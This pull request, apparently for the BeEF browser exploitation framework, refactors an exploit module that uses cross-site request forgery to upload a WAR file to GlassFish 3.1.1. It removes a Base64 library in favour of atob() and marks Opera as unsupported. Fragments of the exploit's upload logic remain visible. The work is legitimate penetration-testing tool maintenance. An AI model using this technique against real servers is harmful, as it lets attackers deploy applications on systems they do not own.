### PR TITLE
Closes #661  Glassfish 3.1.1 war upload csrf

### DIFF
--- a/modules/exploits/glassfish_war_upload_xsrf/command.js
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -25,99 +25,6 @@ beef.execute(function() {
 	
   var logUrl = restHost + '/management/domain/applications/application';
 
-  //BEGIN Daniel Guerrero binary Base64-library
-/*
-Copyright (c) 2011, Daniel Guerrero
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-    * Redistributions of source code must retain the above copyright
-      notice, this list of conditions and the following disclaimer.
-    * Redistributions in binary form must reproduce the above copyright
-      notice, this list of conditions and the following disclaimer in the
-      documentation and/or other materials provided with the distribution.
-    * Neither the name of the Daniel Guerrero nor the
-      names of its contributors may be used to endorse or promote products
-      derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY
-DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
-ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
-
-/**
- * Uses the new array typed in javascript to binary base64 encode/decode
- * at the moment just decodes a binary base64 encoded
- * into either an ArrayBuffer (decodeArrayBuffer)
- * or into an Uint8Array (decode)
- * 
- * References:
- * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer
- * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array
- */
-
-var Base64Binary = {
-	_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
-
-	/* will return a  Uint8Array type */
-	decodeArrayBuffer: function(input) {
-		var bytes = Math.ceil( (3*input.length) / 4.0);
-		var ab = new ArrayBuffer(bytes);
-		this.decode(input, ab);
-
-		return ab;
-	},
-
-	decode: function(input, arrayBuffer) {
-		//get last chars to see if are valid
-		var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); 
-		var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); 
-
-		var bytes = Math.ceil( (3*input.length) / 4.0);
-		if (lkey1 == 64) bytes--; //padding chars, so skip
-		if (lkey2 == 64) bytes--; //padding chars, so skip
-
-		var uarray;
-		var chr1, chr2, chr3;
-		var enc1, enc2, enc3, enc4;
-		var i = 0;
-		var j = 0;
-
-		if (arrayBuffer)
-			uarray = new Uint8Array(arrayBuffer);
-		else
-			uarray = new Uint8Array(bytes);
-
-		input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
-
-		for (i=0; i<bytes; i+=3) {	
-			//get the 3 octects in 4 ascii chars
-			enc1 = this._keyStr.indexOf(input.charAt(j++));
-			enc2 = this._keyStr.indexOf(input.charAt(j++));
-			enc3 = this._keyStr.indexOf(input.charAt(j++));
-			enc4 = this._keyStr.indexOf(input.charAt(j++));
-
-			chr1 = (enc1 << 2) | (enc2 >> 4);
-			chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
-			chr3 = ((enc3 & 3) << 6) | enc4;
-
-			uarray[i] = chr1;			
-			if (enc3 != 64) uarray[i+1] = chr2;
-			if (enc4 != 64) uarray[i+2] = chr3;
-		}
-
-		return uarray;	
-	}
-}
-  //END Daniel Guerrero binary Base64-library
 
   if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
     XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
@@ -204,10 +111,8 @@ var Base64Binary = {
     var c = "--" + boundary + "\r\n" 
     c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; 
     c += "Content-Type: application/octet-stream\r\n\r\n";
-
-    for(var i = 0; i< value.length; i++){
-      c+=String.fromCharCode(value[i] & 0xff);
-    }
+    
+    c += atob(value);
 
     c += "\r\n";
     return c;   
@@ -215,7 +120,7 @@ var Base64Binary = {
   
   
   function start() {
-    fileUpload(Base64Binary.decode(warBase),warName);
+    fileUpload(warBase,warName);
   }
 
   start(); 

--- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -23,4 +23,4 @@ beef:
             authors: ["Bart Leppens"]
             target:
                 working: ["FF", "S", "C"]
-                not_working: ["IE"]
+                not_working: ["IE", "O"]


### PR DESCRIPTION
Doesn't work in Opera and IE due to CORS restrictions (refer to: https://developer.mozilla.org/en/HTML/CORS_settings_attributes ).  In IE it doesn't work either due to the lack of sendAsBinary in xmlhttprequest.  So I simplified the code and removed the base64-library (now I use atob() instead which is supported by default on C, S and FF).
